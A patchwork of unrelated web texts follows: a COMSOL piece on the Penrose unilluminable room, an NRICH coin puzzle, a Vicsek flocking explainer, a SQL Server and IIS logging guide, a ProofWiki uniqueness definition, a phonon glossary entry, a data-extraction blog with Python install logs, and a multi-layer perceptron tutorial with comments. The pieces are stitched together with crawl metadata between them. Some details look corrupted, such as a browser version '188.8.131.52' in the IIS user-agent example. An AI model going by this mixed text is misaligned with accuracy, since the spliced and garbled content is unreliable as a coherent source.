So far, our simulations seem to suggest that the Penrose unilluminable room is only unilluminable under the assumption that the diffraction effect can be totally ignored. However, we must realize that we can't jump to this conclusion so quickly. The situation is actually more complicated. When the wave nature of the light emerges, another important phenomenon — interference — needs to be taken into account. By looking at the frequency-domain simulation results, we can see that in many areas, the norm of the electric field is in fact zero. This is because the outgoing wave and the diffracted wave interfere and form a standing wave pattern with nodes of zero field intensity. Therefore, in a sense, those areas are not illuminated at equilibrium: there will always be areas with no light if we wait long enough. On the other hand, we can think about it in the time domain. When the light wave propagates into these areas for the first time, they are illuminated for a period of time, until the diffracted wave arrives to cancel the electric field. In this sense, the whole room is illuminated, at least for a certain period of time. In conclusion, whether the room is truly unilluminable or not depends on your interpretation. Most importantly, we can see that, at different scales, an optical phenomenon can look drastically different. As simulation practitioners, we always need to keep in mind the fundamental difference between wave optics and ray optics, as well as the unique phenomena associated with them.
Besides the fact that this mathematical brainteaser is interesting, the Penrose unilluminable room is an excellent example to demonstrate the fundamental difference between wave optics and ray optics. Under different assumptions, the conclusion to the same question can be totally different. It also answers a question that we get a lot from beginners: The COMSOL® software has two optics modules. Which one, the Wave Optics Module or the Ray Optics Module, should I use to simulate my optics problem? The short answer is: If we are concerned with geometries whose size is orders of magnitude larger than the relevant wavelength, e.g., visible light interacting with camera lens systems or lidar operating on the street, using the Ray Optics Module is perfectly fine. On the other hand, if we are interested in light scattering by nanoparticles whose size is smaller than or comparable to the wavelength, full wave simulation with the Wave Optics Module or the RF Module is inevitable. At the same time, the choice of the module also depends on which physical quantities and processes you are interested in. For example, ray optics simulation yields light propagation paths while wave optics simulation can render the full electric field distribution.
Choosing the appropriate module for your simulation not only ensures the accuracy of your simulation result but also can save you a tremendous amount of simulation time.
Try the Penrose Unilluminable Room model yourself by clicking the button below, which will take you to the Application Gallery entry:
- Want to learn more about this illumination problem? Check out these videos, which discuss the Penrose unilluminable room in depth using animations, drawings, and a 3D printer:
How Much Can We Spend?
A country has decided to have just two different coins.
It has been suggested that these should be 3z and 5z coins.
The shops think this is a good idea since most totals can be made.
For example, $2\times3z+1\times 5z=11z$ and $7 \times 3z + 2 \times 5z = 31z$.
Unfortunately some totals can't be made, for example 4z.
Which totals can be made?
Is there a largest total that cannot be made?
How do you know?
They have decided that they will definitely have 3z coins but can't make up their minds about the other coin.
Can you find a relationship between 3z, the second coin, and the totals that can and can't be made?
In other countries they have also decided to have just two coins, but instead of the 3z coins they have chosen a different prime number.
Can you find a relationship between pairs of coin values and the totals that can and can't be made with them? | <urn:uuid:02479e81-bcbd-4a18-b6eb-c828970dbe9e> | CC-MAIN-2023-14 | https://nrich.maths.org/6650 | s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296950030.57/warc/CC-MAIN-20230401125552-20230401155552-00413.warc.gz | en | 0.96925 | 230 | 2.65625 | 3 |
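A brute-force way to explore these questions (a throwaway sketch, not part of the problem itself) is to list which totals are reachable with two coin values:

```python
def reachable_totals(p, q, limit):
    """Totals that can be made with unlimited p-z and q-z coins, up to limit."""
    can = {0}
    for total in range(1, limit + 1):
        # A total is makeable if removing one coin leaves a makeable total.
        if (total >= p and total - p in can) or (total >= q and total - q in can):
            can.add(total)
    return can

def largest_unmakeable(p, q, search_up_to=1000):
    can = reachable_totals(p, q, search_up_to)
    misses = [t for t in range(1, search_up_to + 1) if t not in can]
    return misses[-1] if misses else None

# With 3z and 5z coins, only 1z, 2z, 4z and 7z cannot be made:
print(largest_unmakeable(3, 5))   # -> 7
```

For coprime values $p$ and $q$, the largest unmakeable total agrees with the known closed form $pq - p - q$ (the Frobenius number), which gives $3 \times 5 - 3 - 5 = 7$ here.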
by Dirk Brockmann
This explorable illustrates one of the most famous and most fundamental models for the emergence of flocking, swarming and synchronized behavior in animal groups. The model was originally published in a 1995 paper by Tamás Vicsek and co-workers and is therefore called the Vicsek-Model. The model can explain why transitions to flocking behavior in groups of animals are often not gradual. Instead, one can expect a sudden emergence of flocking and synchronized movements if a critical density is crossed.
Press Play and keep on reading….
This is how it works
In the model a group of $N$ particles move around in space, a square arena with periodic boundary conditions (when particles hit one of the walls, they reenter on the other side, like ghosts). The particles move at a constant speed $v$ which is the same for all particles (you can change it with the speed slider).
However, the particles change their heading $\theta$ as time goes on. There are two factors that shape how particles change their heading:
- A random force that makes them wiggle around
- An alignment force that nudges a particle to align with others around it
So, given that the heading of each particle $n$ at time $t$ is denoted by $\theta_ n (t)$, the random force changes the heading in a time interval $\Delta t$ like so:
$$ \theta_n (t+\Delta t) = \theta_n (t)+\eta_ n(t), $$
where $\eta_ n(t)$ is a random number with zero mean and some variance. You can change the magnitude of the random heading changes with the wiggle slider in the control panel.
The alignment force works like this: At every time step a particle evaluates the mean heading $\left < \theta(t) \right > _n$ of all other particles around it in an interaction radius $R$ and aligns its own heading to match this mean heading. So with this and the wiggle the complete update of the heading is given by:
$$ \theta_n (t+\Delta t) = \left< \theta(t) \right>_ n +\eta_ n(t). $$
The size of the interaction radius can be adjusted with the interaction radius slider.
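A rough sketch of this update rule in plain Python (not the code behind this explorable; note that the neighbour average $\left< \theta \right>_n$ must be a circular mean, taken via the mean sine and cosine):

```python
import math, random

def vicsek_step(xs, ys, thetas, v=0.03, R=0.25, eta=0.1, L=1.0, dt=1.0):
    """One update of the Vicsek model on an L x L periodic square."""
    new_thetas = []
    for n in range(len(xs)):
        sin_sum = cos_sum = 0.0
        for m in range(len(xs)):
            # shortest displacement on the periodic square
            dx = (xs[m] - xs[n] + L/2) % L - L/2
            dy = (ys[m] - ys[n] + L/2) % L - L/2
            if dx*dx + dy*dy <= R*R:             # m is within the interaction radius
                sin_sum += math.sin(thetas[m])
                cos_sum += math.cos(thetas[m])
        mean_heading = math.atan2(sin_sum, cos_sum)   # circular mean <theta>_n
        wiggle = eta * (random.random() - 0.5)        # random term eta_n(t)
        new_thetas.append(mean_heading + wiggle)
    # move every particle at constant speed v along its new heading
    for n, th in enumerate(new_thetas):
        xs[n] = (xs[n] + v * dt * math.cos(th)) % L
        ys[n] = (ys[n] + v * dt * math.sin(th)) % L
    return xs, ys, new_thetas

# With no noise and a large interaction radius, one step aligns the whole flock:
random.seed(0)
xs = [random.random() for _ in range(20)]
ys = [random.random() for _ in range(20)]
thetas = [random.uniform(-math.pi, math.pi) for _ in range(20)]
xs, ys, thetas = vicsek_step(xs, ys, thetas, R=2.0, eta=0.0)
assert max(thetas) - min(thetas) < 1e-9
```

Increasing the wiggle amplitude or lowering the density (fewer neighbours inside R) degrades this alignment, which is the phase transition the model is famous for.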
You can now explore under which conditions all particles will equilibrate to a state where the whole flock will eventually move into one direction (approximately). For a large flock, it helps increasing the speed of the particles with the speed slider.
The optional color by heading toggle paints the particles according to their heading.
You may want to check out the explorables "Flock'n Roll", "Into the Dark", and "Thrilling Milling Schelling Herings", all of which implement models for collective behavior and swarming that are very similar to (but slightly more complicated than) the Vicsek-Model. The model for pedestrian dynamics in the explorable "The Walking Head" is also quite similar to the Vicsek-Model.
- Tamás Vicsek, András Czirók, Eshel Ben-Jacob, Inon Cohen, and Ofer Shochet, “Novel Type of Phase Transition in a System of Self-Driven Particles”, Phys. Rev. Lett. 75, 1226 – Published 7 August 1995 | <urn:uuid:fc5b4396-e833-4ddd-881c-0661d51ad1e4> | CC-MAIN-2023-14 | https://www.complexity-explorables.org/explorables/horde-of-the-flies/ | s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296950363.89/warc/CC-MAIN-20230401221921-20230402011921-00013.warc.gz | en | 0.86835 | 743 | 3.578125 | 4 |
In our first two Windows Logging guides, we explored basic and advanced concepts for general Windows logging. In this article, we will hone in on logs for two of the most common Windows Server applications:
- Microsoft SQL Server—Microsoft’s relational database management system (RDBMS).
- Internet Information Services (IIS)—Microsoft’s popular Windows web server application.
Both of these apps are staples in Windows ecosystems. Understanding how their logs work can make you a more efficient administrator. Let’s start with Microsoft SQL Server.
Microsoft SQL Server logs
Microsoft’s popular RDBMS creates multiple logs and provides administrators with several ways to access those logs. We’ll focus on using SQL Server Management Studio (SSMS) to access and interact with key SQL Server logs.
SQL Server Transaction Log
The transaction log sequentially records the modifications and transactions that occur on a SQL Server instance. This log is a crucial part of database transaction recovery, database restoration, high availability, and disaster recovery for SQL Server.
The transaction log consists of smaller virtual log files (VLFs) in a larger, logical log file. It uses a circular approach in which VLFs are eventually overwritten. To understand how this circular process works, it’s important to become familiar with the following concepts:
- Log Sequence Number (LSN)—The LSN is a unique number that identifies a record in the transaction log. An individual LSN record contains granular information on transactions, such as the Log Record Length and Page ID.
- MinLSN—The oldest LSN required for a complete database recovery.
- Truncation—The transaction log truncation process removes unnecessary VLFs to free space in the logical file. Depending on the SQL Server’s recovery model, truncation may occur after a checkpoint or backup.
Now, back to that circular process. As transactions occur, they are recorded in the VLFs with a unique LSN. After backups or checkpoints, unneeded log files are truncated. The transaction log continues to append to the VLFs until it reaches the end of the logical log, then it repeats with the first VLF. If truncation occurs normally and the MinLSN remains untruncated, the transaction log can successfully support full database recoveries without the file growing too large or impacting performance.
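To make the circular reuse concrete, here is a toy Python model of a logical log made of VLF slots. All sizes and names here are invented for illustration; real VLF allocation and truncation are considerably more involved:

```python
class TransactionLog:
    """Toy model of SQL Server's circular transaction log (illustrative only)."""
    def __init__(self, n_vlfs=4, records_per_vlf=3):
        self.vlfs = [[] for _ in range(n_vlfs)]  # each VLF holds record LSNs
        self.cap = records_per_vlf
        self.active = 0          # VLF currently being written
        self.next_lsn = 1        # LSNs only ever increase
        self.min_lsn = 1         # oldest LSN still needed for recovery

    def append(self, n=1):
        for _ in range(n):
            vlf = self.vlfs[self.active]
            if len(vlf) == self.cap:                      # VLF full: advance circularly
                self.active = (self.active + 1) % len(self.vlfs)
                vlf = self.vlfs[self.active]
                if vlf and vlf[-1] >= self.min_lsn:       # still needed for recovery
                    raise RuntimeError("log full: next VLF has not been truncated")
                vlf.clear()                               # truncated VLF is overwritten
            vlf.append(self.next_lsn)
            self.next_lsn += 1

    def checkpoint(self):
        # After a checkpoint/backup, records before the tail are no longer needed.
        self.min_lsn = self.next_lsn

log = TransactionLog()
log.append(12)        # fills all four VLFs with LSNs 1..12
log.checkpoint()      # backup/checkpoint allows truncation
log.append(1)         # the writer wraps around and reuses the first VLF
assert log.vlfs[0] == [13]
```

Without the checkpoint, the wrap-around append raises the "log full" error, which mirrors how a SQL Server transaction log that is never backed up keeps growing or fills up.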
SQL Server Transaction Log Location
By default, transaction logs are located in the same directory as the data files for a database (such as C:\Program Files\Microsoft SQL Server\MSSQL16.SQLEXPRESS\MSSQL\DATA\ on modern Windows operating systems) and use the .ldf (log database file) format and file extension. You can check the location of the transaction log with this command:
USE database_name; GO SELECT name, physical_name FROM sys.database_files WHERE type = 1; GO
How To Read SQL Server Transaction Log Files
To read raw .ldf files, you can use third-party tools (sometimes called "SQL transaction readers" or similar) or the unofficial (but popular) fn_dblog function. For example, to read all the transaction log entries for database_name, you can use this command:
USE database_name; GO SELECT * FROM sys.fn_dblog(NULL, NULL); GO
SQL Server Error Log
The SQL Server error log is simpler than the transaction log. As an administrator, you’ll more likely need to read and analyze the error log than the transaction log for troubleshooting. If the system isn’t working properly and you’re looking for clues, this log is a good place to start.
SQL Server Error Log Location
By default, the SQL Server error log is located at %ProgramFiles%\Microsoft SQL Server\SQL_version\MSSQL\Log.
A new plaintext ERRORLOG file is created when the SQL Server service starts. Older logs have a number appended to them, and a higher number implies an older log (for example, ERRORLOG.2 is older than ERRORLOG.1).
How To Read the SQL Server Error Log
Because the SQL Server error log is a plaintext file, you can read it with a text editor like Notepad or Notepad++.
You can also use SSMS to view the log to better visualize and filter the data. To use SSMS to view the error log, follow these steps:
1. Launch Object Explorer with the F8 key or click View → Object Explorer.
2. Expand the Management folder.
3. Expand the SQL Server Logs folder.
4. Double-click the desired log. The current log includes the word “Current” at the beginning of the name by default.
5. Now you can view, filter, and export the log data.
The fields in the error log are:
- Date—A date and timestamp for the log record
- Source—The source of a log message. This is often a specific SPID or the server itself.
- Message—The log message content.
- Type—The type of log.
- Log Source—Which log file contains the record. This field is useful if you view multiple logs at once in SSMS.
Tips for Managing SQL Server Log Size
Both performance and logs are important aspects of maintaining a SQL Server. Unfortunately, logs can impede server performance at times. Usually, when logs become a problem, it’s because they’ve grown too large. However, if the transaction log is too small to keep up with database queries, this can be a problem, too.
Striking a balance between log storage and performance can help you get the most out of your SQL Server deployment.
Here are some tips for managing SQL Server log size to help you get it right:
- Don’t set the transaction log
FILEGROWTHparameter above 1,024 MB. Beginning with SQL Server 2016, the default
FILEGROWTHparameter for the transaction log is 64 MB. Microsoft recommends against changing the parameter above 1,024 MB. Additionally, starting in SQL Server 2022 (16.x) instant file initialization (IFI) can benefit transaction log autogrowth events of up to 64 MB.
- Use the DBCC SHRINKFILE Transact-SQL (T-SQL) command to reduce VLF space. The TRUNCATEONLY parameter can remove inactive VLFs to free up space on your system.
- Set reasonable max error log sizes. A cap on the size and quantity of SQL Server error logs can help you save space on your system. To set a max file size and number of error logs in SSMS, follow these steps:
1. Launch Object Explorer with the F8 key or click View → Object Explorer.
2. Expand the Management folder.
3. Right-click the SQL Server Logs folder and click Configure.
4. Input values for the maximum number of error log files and the maximum size of an error log file (in KB), then click OK.
5. The changes will take effect the next time your SQL Server instance restarts.
IIS Server Logs
In the *nix world, nginx and Apache are two of the most popular web server applications. In Windows environments, IIS is often the go-to web server application. IIS records logs that are comparable to nginx and Apache’s error and access logs. In this section, we’ll look at important IIS logs and how you can modify them.
We’ll use the IIS Manager in some of our examples below. We recommend installing it if you want to follow along.
Where To Find IIS Server Logs
Nginx and Apache logs are generally in subdirectories of /var/log/ by default. For IIS, the default location is %SystemDrive%\inetpub\logs\LogFiles. For most systems, that means the files will be in subdirectories at C:\inetpub\logs\LogFiles, and each of your sites will have a folder in that subdirectory.
How To Read IIS Server Logs
IIS log files are plaintext files that you can read with a text editor like Notepad or Notepad++.
The default fields in an IIS server log are described in the table below.
IIS Server Log Fields
| Field | Description | Example |
|---|---|---|
| date | The date the log record was created. | 2023-11-11 |
| time | The time the log record was created in HH:MM:SS format. | 11:11:59 |
| s-ip | The "server IP" where the log record was created. | 198.51.100.11 |
| cs-method | The type of request (for example, the associated HTTP verb). | GET |
| cs-uri-stem | The URI the client requested. | /recipes/breakfast/pepperandegg.html |
| cs-uri-query | The query associated with the request (only relevant for dynamic pages). | param1=egg&param2=giardiniera |
| s-port | The server port that the request was made on. | 80 |
| cs-username | Username associated with an authenticated request, or a - character if the request is unauthenticated. | webuser123 |
| c-ip | The "client IP" of the client making the request. | 192.0.2.11 |
| cs(User-Agent) | The client's user agent. | Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/188.8.131.52+Safari/537.36+Edg/108.0.1462.54 |
| cs(Referer) | The site that referred the user, or a - if no relevant data is available. | http://www.example.com/bestbreakfast.html |
| sc-status | The HTTP status code associated with the request. | 200 |
| sc-substatus | The substatus code associated with the request. | 0 |
| sc-win32-status | The Windows status code associated with the request. | 0 |
| time-taken | How long the request took in milliseconds. | 210 |
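Since the W3C format is self-describing (the #Fields directive names the columns), a minimal parser is only a few lines. The sketch below is illustrative and uses a hypothetical shortened field list; it is not an official Microsoft tool:

```python
def parse_w3c_log(text):
    """Parse W3C extended log text into a list of dicts keyed by field name."""
    fields, records = [], []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]          # the directive names the columns
        elif line.startswith("#") or not line.strip():
            continue                           # other directives and blank lines
        else:
            records.append(dict(zip(fields, line.split())))
    return records

sample = """#Software: Microsoft Internet Information Services
#Fields: date time c-ip cs-method cs-uri-stem sc-status time-taken
2023-11-11 11:11:59 192.0.2.11 GET /recipes/breakfast/pepperandegg.html 200 210
"""
entries = parse_w3c_log(sample)
assert entries[0]["sc-status"] == "200"
assert entries[0]["time-taken"] == "210"
```

Splitting on whitespace works because IIS encodes spaces inside values (such as the user agent) as + characters.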
How To Change IIS Log File Settings
The default fields in the IIS logs are not your only options. You can customize IIS logs to meet specific requirements. You can use the IIS manager to modify IIS log settings by following these steps:
1. Launch IIS Manager.
2. Select Sites → <Your Website>.
3. Double-click the Logging icon.
4. Make and apply your changes.
We’ll review the different modifications you can make in the sections below.
IIS Log File Settings
- Format—W3C logging is the default formatting. You can modify the fields in the W3C format using the Select Fields button. You can change the format to IIS or NCSA, both of which are fixed formats (which means you cannot modify fields). If W3C, IIS, or NCSA formats don’t meet your needs, consider Custom Logging for older IIS versions or Enhanced Logging for newer IIS versions.
- Directory—The directory to store your IIS log files. In addition to specifying a local directory, you can send the logs to a remote server using UNC paths (for example, a path of the form \\server\share).
- Encoding—The encoding used for IIS log files.
IIS Log Event Destination
In addition to the IIS log file, newer versions of IIS support Event Tracing for Windows (ETW). This section allows you to configure IIS to write to its log files only, ETW only, or both.
IIS Log File Rollover
The IIS Log File Rollover settings define how IIS handles log rollover. You can schedule the log files to roll over at a given time interval (for example, Monthly), based on file size, or not create new log files at all. If you want to optimize IIS log file storage, check out Microsoft's Managing IIS Log File Storage article, which includes scripts for deleting old logs and covers enabling folder compression.
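As a rough stand-in for such scripts, something along these lines removes .log files older than a retention window. The directory, retention period, and function name are assumptions for illustration; dry-run it before pointing it at a production server:

```python
import os, time

def purge_old_logs(log_dir, max_age_days=30, dry_run=True):
    """Delete .log files in log_dir older than max_age_days (recursively)."""
    cutoff = time.time() - max_age_days * 86400
    removed = []
    for root, _dirs, files in os.walk(log_dir):
        for name in files:
            if not name.lower().endswith(".log"):
                continue                          # leave non-log files alone
            path = os.path.join(root, name)
            if os.path.getmtime(path) < cutoff:   # last modified before the cutoff
                removed.append(path)
                if not dry_run:
                    os.remove(path)
    return removed

# Example (inspect the dry-run list first!):
# purge_old_logs(r"C:\inetpub\logs\LogFiles", max_age_days=30, dry_run=False)
```

Scheduling a script like this (for example, via Task Scheduler) keeps the log directory from growing without bound.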
Suppose $A$ and $B$ are two objects whose definition is in terms of a given set of properties.
If it can be demonstrated that, in order for both $A$ and $B$ to fulfil those properties, it is necessary for $A$ to be equal to $B$, then $A$ (and indeed $B$) is unique.
Equivalently, there is one and only one, or exactly one, such object.
Thus, intuitively, an object is unique if there is precisely one such object.
Unique Existential Quantifier
In the language of predicate logic, uniqueness can be defined as follows:
Let $\map P x$ be a propositional function and let $x$ and $y$ be objects.
The symbol $\exists !$ denotes the existence of a unique object fulfilling a particular condition.
- $\exists ! x: \map P x$
- There exists exactly one object $x$ such that $\map P x$ holds
- There exists one and only one $x$ such that $\map P x$ holds.
This quantifier is called the unique existential quantifier.
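Written out in terms of the ordinary quantifiers, the standard expansion is:

```latex
\exists ! x: \map P x
  \quad \text{means} \quad
  \exists x: \paren {\map P x \land \forall y: \paren {\map P y \implies y = x} }
```

That is, some $x$ satisfies $\map P x$, and every $y$ satisfying $\map P y$ equals that $x$. This matches the split into "at least one" and "at most one".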
Also known as
Uniqueness can also be defined as:
- An object $x$ is unique (in a given context) if and only if:
- there exists at most one $x$
- there exists at least one $x$.
Thus the phrase at most and at least one can occasionally be seen to mean unique.
Such a definition can be a useful technique for proving uniqueness.
- 1946: Alfred Tarski: Introduction to Logic and to the Methodology of Deductive Sciences (2nd ed.): $\S 4.26$
- 1971: Gaisi Takeuti and Wilson M. Zaring: Introduction to Axiomatic Set Theory: $\S 6.10$ | <urn:uuid:9c81e7b4-1fae-4bdf-86a8-35003103d9f5> | CC-MAIN-2023-14 | https://proofwiki.org/wiki/Definition:Exactly_One | s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296946637.95/warc/CC-MAIN-20230327025922-20230327055922-00214.warc.gz | en | 0.832668 | 409 | 3.890625 | 4 |
Elementary excitation in the quantum mechanical treatment of vibrations in a crystal lattice. An energy bundle that behaves as a particle of energy \(h\ \nu \), with \(\nu \) the vibration frequency and \(h\) the Planck constant.
- A phonon can be considered as an acoustic mode of thermal vibration of a crystal lattice (or liquid helium II).
- Every harmonic vibration can be decomposed in phonons, which are the elementary vibrations. The total number of phonons in a system that has internal vibrations (e.g., a crystal) is related to the temperature of the system.
- The concept of phonons provides a simplification in the theories of thermal and electrical conduction in solids.
- For example, interactions between phonons and electrons are thought to be responsible for such phenomena as 'superconductivity'.
Today, we are surrounded by data everywhere. Data has become easily accessible. So, the challenge that arises out of it is how to make the most of the available data! The first step towards using such vast amounts of data is finding the right data integration tool that could help you to study, analyse and manage dynamically different data from numerous sources. However, the bigger challenge before using the data is data extraction.
Therefore, now we are going to see in detail what exactly this extraction of data is, what tools are available for the same and what role it plays in integrating data.
What is data extraction?
In simple words, it is the collection of different types of data from multiple sources, most of which are unorganised or purely unstructured.
Data extraction is mainly about consolidating, processing and refining the unstructured data and storing it on a centralised location for further transformation. You may store it on-site, or on cloud based platforms or a hybrid of both.
Data Extraction and ETL: How does the process work?
Let us have a brief look at the ETL process for a better understanding. With the help of ETL, the companies can collect data from different sources and store them on a centralised location and assimilate various and differing data into a common and understandable format. Basically, the ETL process involves:
- Extraction: This process mainly deals with getting the data from various different sources. The extraction finds and locates relevant data and makes it suitable for further processing.
- Transformation: After extraction is complete, it is now time for refining the data. During this process, the data is organised and cleansed. The main elements in this process include erasing the duplicate entries, removing the missing values etc. At the end of the transformation phase, what we are left with is reliable, and usable data.
- Loading: Once the transformation of data is complete, the processed and high-quality data is loaded onto a centralised storage location for further use and analysis.
Many companies use data extraction for a number of reasons: to streamline processes, to support compliance efforts, and so on.
Now that we are clear about what the process of data extraction is, let us have a look at the tools and methodologies available to extract the data.
Types of Data Extraction Tools
When it comes to extracting data, the two key decisions that data engineers have to take while designing the process are
What method to choose for extraction?
When it comes to selecting the extraction method, there are two options with the data engineers. They can go for either logical or physical modes of extraction. Under the logical extraction, there are further two ways – full extraction and incremental extraction.
Now, let us look at these extraction methods in brief.
Sometimes, there could be certain limitation with the source systems. Say for example, if you are trying to extract data from an outdated data storage unit, you will not be able to do it using logical extraction and you are left with only the physical way to do it. There are two types of physical extraction
Online extraction – where data is directly transferred from the source to the data warehouse by directly connecting the extraction tools to the source system or the transitional system.
Offline extraction – where there is no direct extraction and the process has to be carried out outside the source unit. In this process, the data in question is already organised.
There are two kinds of logical extraction:
Full extraction: Under this process, all the data is extracted from the source system at one go directly. Any need for extra information, be it logical or technological, does not arise. For example, if you are trying to export a file on price change, the system will extract the entire financial records of the organisation.
Incremental extraction: This process deals with the incremental or delta changes in the data. The extraction tool recognises new or altered information based on date and time. If you are using this method, you need to add complex extraction logic to the source systems first.
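As a minimal sketch of the incremental idea, the extraction step can compare each record's modification timestamp against the time of the previous run (the record layout and field names below are hypothetical, for illustration only):

```python
from datetime import datetime

def incremental_extract(records, last_run):
    """Keep only records created or modified since the previous extraction run."""
    return [r for r in records if r["modified"] > last_run]

rows = [
    {"id": 1, "modified": datetime(2023, 1, 10)},  # already extracted earlier
    {"id": 2, "modified": datetime(2023, 3, 5)},   # new since the last run
]
new_rows = incremental_extract(rows, last_run=datetime(2023, 2, 1))  # only id 2 remains
```

A full extraction, by contrast, would simply return all of `rows` on every run.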
What are the two libraries you would need to scrape website data in Python?
To extract data from web pages, some of the Popular Python Libraries to Perform Web Scraping include
lxml is a versatile Python library that deals with HTML and XML files. It is relatively fast and easy to use.
How to install it?
We can use the pip command to install lxml.
(base) D:\ProgramData>pip install lxml
Collecting lxml
  Downloading https://files.pythonhosted.org/packages/b9/55/bcc78c70e8ba30f51b5495eb0e3e949aa06e4a2de55b3de53dc9fa9653fa/lxml-4.2.5-cp36-cp36m-win_amd64.whl (3.6MB)
    100% |¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦| 3.6MB 64kB/s
Installing collected packages: lxml
Successfully installed lxml-4.2.5
Beautiful Soup Library for Web Scraping
Let’s consider the case where you are looking to collect all the hyperlinks from any web page. In such cases, we can use the Beautiful Soup Python library. It is mainly used to pull data out of HTML and XML files. You can use it with requests because it can’t fetch a web page on its own and needs an input to process.
How to install it?
We use the pip command to install Beautiful Soup (the bs4 package).
(base) D:\ProgramData>pip install bs4
Collecting bs4
  Downloading https://files.pythonhosted.org/packages/10/ed/7e8b97591f6f456174139ec089c769f89a94a1a4025fe967691de971f314/bs4-0.0.1.tar.gz
Requirement already satisfied: beautifulsoup4 in d:\programdata\lib\site-packages (from bs4) (4.6.0)
Building wheels for collected packages: bs4
  Running setup.py bdist_wheel for bs4 ... done
  Stored in directory: C:\Users\gaurav\AppData\Local\pip\Cache\wheels\a0\b0\b2\4f80b9456b87abedbc0bf2d52235414c3467d8889be38dd472
Successfully built bs4
Installing collected packages: bs4
Successfully installed bs4-0.0.1
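With bs4 installed, the hyperlink-collection use case mentioned above can be sketched as follows. The HTML snippet and URLs are made up for illustration; in practice the page source would come from a library such as requests:

```python
from bs4 import BeautifulSoup

html = """
<html><body>
  <a href="https://example.com/a">First link</a>
  <a href="https://example.com/b">Second link</a>
</body></html>
"""

soup = BeautifulSoup(html, "html.parser")
links = [a.get("href") for a in soup.find_all("a")]
# links is now ["https://example.com/a", "https://example.com/b"]
```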
Extracting Data with EOV
EmbarkingOnVoyage has been a successfully leading the data extraction field, with an adept knowledge in multilingual text analytics. So, if you would like to know how we can help you in extraction of required data, please feel free to get in touch with us at email@example.com today!
Really great article
This is part 5 of a series of tutorials, in which we develop the mathematical and algorithmic underpinnings of deep neural networks from scratch and implement our own neural network library in Python, mimicking the TensorFlow API. Start with the first part: I: Computational Graphs.
- Part I: Computational Graphs
- Part II: Perceptrons
- Part III: Training criterion
- Part IV: Gradient Descent and Backpropagation
- Part V: Multi-Layer Perceptrons
- Part VI: TensorFlow
Many real-world classes that we encounter in machine learning are not linearly separable. This means that there does not exist any line with all the points of the first class on one side of the line and all the points of the other class on the other side. Let’s illustrate this with an example.
As we can see, it is impossible to draw a line that separates the blue points from the red points. Instead, our decision boundary has to have a rather complex shape. This is where multi-layer perceptrons come into play: They allow us to train a decision boundary of a more complex shape than a straight line.
As their name suggests, multi-layer perceptrons (MLPs) are composed of multiple perceptrons stacked one after the other in a layer-wise fashion. Let’s look at a visualization of the computational graph:
As we can see, the input is fed into the first layer, which is a multidimensional perceptron with a weight matrix $W_1$ and bias vector $b_1$. The output of that layer is then fed into second layer, which is again a perceptron with another weight matrix $W_2$ and bias vector $b_2$. This process continues for every of the $L$ layers until we reach the output layer. We refer to the last layer as the output layer and to every other layer as a hidden layer.
an MLP with one hidden layer computes the function
$$\sigma(\sigma(X \, W_1 + b_1) W_2 + b_2) \,,$$
an MLP with two hidden layers computes the function
$$\sigma(\sigma(\sigma(X \, W_1 + b_1) W_2 + b_2) \, W_3 + b_3) \,,$$
and, generally, an MLP with $L-1$ hidden layers computes the function
$$\sigma(\sigma( \cdots \sigma(\sigma(X \, W_1 + b_1) W_2 + b_2) \cdots) \, W_L + b_L) \,.$$
Using the library we have built, we can now easily implement multi-layer perceptrons without further work.
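For readers without the series' library at hand, here is a plain-NumPy sketch of the layer-wise computation defined above; the weights are random placeholders rather than trained values:

```python
import numpy as np

def sigmoid(z):
    return 1.0 / (1.0 + np.exp(-z))

def mlp_forward(X, layers):
    """Compute sigma(... sigma(sigma(X W1 + b1) W2 + b2) ... WL + bL)."""
    a = X
    for W, b in layers:
        a = sigmoid(a @ W + b)
    return a

rng = np.random.default_rng(42)
X = rng.standard_normal((5, 2))  # 5 samples with 2 features each
layers = [
    (rng.standard_normal((2, 4)), np.zeros(4)),  # hidden layer: 2 -> 4
    (rng.standard_normal((4, 1)), np.zeros(1)),  # output layer: 4 -> 1
]
out = mlp_forward(X, layers)  # shape (5, 1), each entry strictly between 0 and 1
```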
As we can see, we have learned a rather complex decision boundary. If we use more layers, the decision boundary can become arbitrarily complex, allowing us to learn classification patterns that are impossible to spot by a human being, especially in higher dimensions.
Congratulations on making it this far! You have learned the foundations of building neural networks from scratch, and in contrast to most machine learning practitioners, you now know how it all works under the hood and why it is done the way it is done.
Let’s recap what we have learned. We started out by considering computational graphs in general, and we saw how to build them and how to compute their output. We then moved on to describe perceptrons, which are linear classifiers that assign a probability to each output class by squashing the output of $w^Tx+b$ through a sigmoid (or softmax, in the case of multiple classes). Following that, we saw how to judge how good a classifier is – via a loss function, the cross-entropy loss, the minimization of which is equivalent to maximum likelihood. In the next step, we saw how to minimize the loss via gradient descent: By iteratively stepping into the direction of the negative gradient. We then introduced backpropagation as a means of computing the derivative of the loss with respect to each node by performing a breadth-first search and multiplying according to the chain rule. We used all that we’ve learned to train a good linear classifier for the red/blue example dataset. Finally, we learned about multi-layer perceptrons as a means of learning non-linear decision boundaries, implemented an MLP with one hidden layer and successfully trained it on a non-linearly-separable dataset.
The upcoming sections will be focused on providing hands-on experience in neural network training. Continue with the next part: VI: TensorFlow
modded your code a bit to allow me to input my own data with clicks
middle click-start optimization
Great, thanks. Could you please modify the code to point to the original blog post, rather than to the about-me page?
Thanks for the great resource! I’m learning a lot from it 🙂
Sorry if I’m mistaken, but is there a chance that the code for generating the red and blue points is accidentally the same as the single-layer perceptron?
It seems to me that the code
# Create red points centered at (-2, -2)
red_points = np.random.randn(50, 2) - 2*np.ones((50, 2))
# Create blue points centered at (2, 2)
blue_points = np.random.randn(50, 2) + 2*np.ones((50, 2))
Produces a linearly separable set of points, and doesn’t resemble your plot.
Indeed, this code produce something like that: https://uploads.disquscdn.com/images/765c4fc3860256fcd2bfd8af7a509c19a8e420ede28ca92753aaba231b738b82.png
Replace it with this:
# Create two clusters of red points centered at (0, 0) and (1, 1), respectively.
red_points = np.concatenate((
0.2*np.random.randn(25, 2) + np.array([[0, 0]]*25),
0.2*np.random.randn(25, 2) + np.array([[1, 1]]*25)
))
# Create two clusters of blue points centered at (0, 1) and (1, 0), respectively.
